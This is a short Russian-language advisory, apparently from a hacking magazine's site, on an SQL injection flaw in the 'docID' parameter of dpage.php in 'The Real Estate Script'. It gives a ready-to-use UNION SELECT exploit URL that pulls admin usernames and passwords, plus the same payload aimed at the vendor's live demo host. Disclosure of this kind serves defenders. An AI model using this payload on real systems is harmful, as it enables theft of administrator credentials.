Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: The Real Estate Script
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «docID» сценарием dpage.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.example.com/dpage.php?docID=-1+union+select+1,2 concat_ws(0x3a3a,Username,Password)+from+admin
Демонстрация:
http://www.therealestatescript.com/demo/dpage.php?docID=-1+union +select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin